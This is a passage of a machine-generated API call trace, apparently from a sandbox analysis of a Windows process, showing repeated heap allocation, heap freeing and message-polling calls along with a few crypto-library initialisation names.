(HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0253.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0253.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0253.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0253.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0253.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0253.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0253.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0253.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0253.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0253.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0253.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0253.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0253.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0253.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0253.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0253.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0253.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0253.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0253.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0253.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0253.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0253.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0253.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0253.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0253.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0253.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0253.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0253.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0253.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0253.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0253.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0253.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0253.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0253.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0253.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0253.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0253.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0253.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0253.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0253.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0253.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0253.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0253.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0253.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0253.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0253.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0253.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0253.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0253.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0253.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0253.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0253.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0253.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0253.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0253.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0253.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0253.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0253.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0253.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0253.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0253.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0253.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0253.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0253.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0253.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0253.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0253.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0253.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0253.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0253.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0253.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0253.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0253.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0253.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0253.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0253.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e563c8 [0253.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0253.410] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0253.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0253.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0253.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0253.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0253.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0253.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0253.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0253.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0253.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0253.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0253.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0253.411] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0253.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0253.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0253.411] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0253.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0253.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0253.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0253.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e18 [0253.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0253.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0253.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0253.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0253.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0253.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0253.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514f0 [0253.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0253.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0253.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0253.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0253.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0253.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0253.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0253.411] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0253.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0253.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0253.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0253.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0253.412] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0253.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0253.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0253.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0253.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0253.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0253.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0253.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0253.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0253.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0253.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0253.412] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0253.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0253.412] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0253.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0253.412] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0253.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55f80 [0253.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0253.412] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0253.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55f80 | out: hHeap=0x970000) returned 1 [0253.412] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0253.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0253.413] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0253.413] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0253.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0253.413] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0253.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0253.413] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0253.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0253.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0253.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0253.413] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0253.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0253.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0253.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0253.413] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0253.413] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0253.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0253.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0253.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0253.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0253.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0253.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0253.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0253.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0253.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0253.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0253.414] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0253.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0253.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0253.414] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0253.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0253.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0253.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0253.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0253.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0253.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0253.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0253.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0253.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0253.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0253.414] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0253.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0253.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0253.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0253.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0253.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0253.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0253.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0253.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0253.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0253.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0253.415] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0253.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0253.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0253.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0253.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0253.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0253.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0253.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0253.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0253.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0253.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0253.415] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0253.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0253.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0253.415] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0253.416] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0253.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0253.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0253.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0253.416] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0253.416] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0253.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0253.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0253.416] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0253.416] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0253.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e56098 [0253.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0253.416] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0253.416] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0253.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0253.416] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0253.416] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0253.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0253.416] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0253.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0253.417] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0253.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0253.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0253.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0253.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0253.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0253.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0253.417] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0253.417] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, 